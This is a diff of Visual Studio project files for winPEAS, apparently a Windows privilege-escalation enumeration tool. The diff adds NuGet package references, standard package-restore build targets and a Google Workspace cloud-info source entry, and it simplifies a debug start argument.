+    <Reference Include="System.Data.SQLite.EF6, Version=1.0.119.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Data.SQLite.EF6.1.0.119.0\lib\net451\System.Data.SQLite.EF6.dll</HintPath>
+    </Reference>
+    <Reference Include="System.Data.SQLite.Linq, Version=1.0.119.0, Culture=neutral, PublicKeyToken=db937bc2d44ff139, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Data.SQLite.Linq.1.0.119.0\lib\net451\System.Data.SQLite.Linq.dll</HintPath>
+    </Reference>
    <Reference Include="System.DirectoryServices.AccountManagement" />
+    <Reference Include="System.IO, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.IO.4.3.0\lib\net462\System.IO.dll</HintPath>
+      <Private>True</Private>
+      <Private>True</Private>
+    </Reference>
    <Reference Include="System.Management" />
    <Reference Include="System.Net.Http" />
+    <Reference Include="System.Runtime, Version=4.1.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Runtime.4.3.0\lib\net462\System.Runtime.dll</HintPath>
+      <Private>True</Private>
+      <Private>True</Private>
+    </Reference>
    <Reference Include="System.Security" />
+    <Reference Include="System.Security.Cryptography.Encoding, Version=4.0.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Security.Cryptography.Encoding.4.3.0\lib\net46\System.Security.Cryptography.Encoding.dll</HintPath>
+      <Private>True</Private>
+      <Private>True</Private>
+    </Reference>
+    <Reference Include="System.Security.Cryptography.Primitives, Version=4.0.1.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a, processorArchitecture=MSIL">
+      <HintPath>..\packages\System.Security.Cryptography.Primitives.4.3.0\lib\net46\System.Security.Cryptography.Primitives.dll</HintPath>
+      <Private>True</Private>
+      <Private>True</Private>
+    </Reference>
    <Reference Include="System.ServiceProcess" />
    <Reference Include="System.Transactions" />
    <Reference Include="System.Web.Extensions" />
@ -1043,6 +1087,7 @@
    <Compile Include="Info\CloudInfo\AWSInfo.cs" />
    <Compile Include="Info\CloudInfo\AzureInfo.cs" />
    <Compile Include="Info\CloudInfo\EndpointData.cs" />
+    <Compile Include="Info\CloudInfo\GWorkspaceInfo.cs" />
    <Compile Include="Info\CloudInfo\GCPInfo.cs" />
    <Compile Include="Info\CloudInfo\CloudInfoBase.cs" />
    <Compile Include="Info\EventsInfo\Logon\ExplicitLogonEventInfo.cs" />
@ -1341,4 +1386,14 @@
  </ItemGroup>
  <ItemGroup />
  <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
+  <Target Name="EnsureNuGetPackageBuildImports" BeforeTargets="PrepareForBuild">
+    <PropertyGroup>
+      <ErrorText>This project references NuGet package(s) that are missing on this computer. Use NuGet Package Restore to download them.  For more information, see http://go.microsoft.com/fwlink/?LinkID=322105. The missing file is {0}.</ErrorText>
+    </PropertyGroup>
+    <Error Condition="!Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.props')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\EntityFramework.6.4.4\build\EntityFramework.props'))" />
+    <Error Condition="!Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\EntityFramework.6.4.4\build\EntityFramework.targets'))" />
+    <Error Condition="!Exists('..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets')" Text="$([System.String]::Format('$(ErrorText)', '..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets'))" />
+  </Target>
+  <Import Project="..\packages\EntityFramework.6.4.4\build\EntityFramework.targets" Condition="Exists('..\packages\EntityFramework.6.4.4\build\EntityFramework.targets')" />
+  <Import Project="..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets" Condition="Exists('..\packages\Stub.System.Data.SQLite.Core.NetFramework.1.0.119.0\build\net451\Stub.System.Data.SQLite.Core.NetFramework.targets')" />
 </Project>
--- a/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
+++ b/winPEAS/winPEASexe/winPEAS/winPEAS.csproj.user
@ -5,7 +5,7 @@
    </StartArguments>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
-    <StartArguments>cloudinfo -network="auto" -ports="21,22,445"</StartArguments>
+    <StartArguments>cloudinfo</StartArguments>
  </PropertyGroup>
  <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|x64'">
    <StartArguments>debug</StartArguments>
				`@ -0,0 +1 @@`
				`{"RootPath":"C:\\Users\\carlos_hacktricks\\Desktop\\git\\PEASS-ng\\winPEAS\\winPEASexe\\Tests","ProjectFileName":"winPEAS.Tests.csproj","Configuration":"Debug\|AnyCPU","FrameworkPath":"","Sources":[],"References":[],"Analyzers":[],"Outputs":[{"OutputItemFullPath":"C:\\Users\\carlos_hacktricks\\Desktop\\git\\PEASS-ng\\winPEAS\\winPEASexe\\Tests\\bin\\Debug\\Tests.dll","OutputItemRelativePath":"Tests.dll"},{"OutputItemFullPath":"","OutputItemRelativePath":""}],"CopyToOutputEntries":[]}`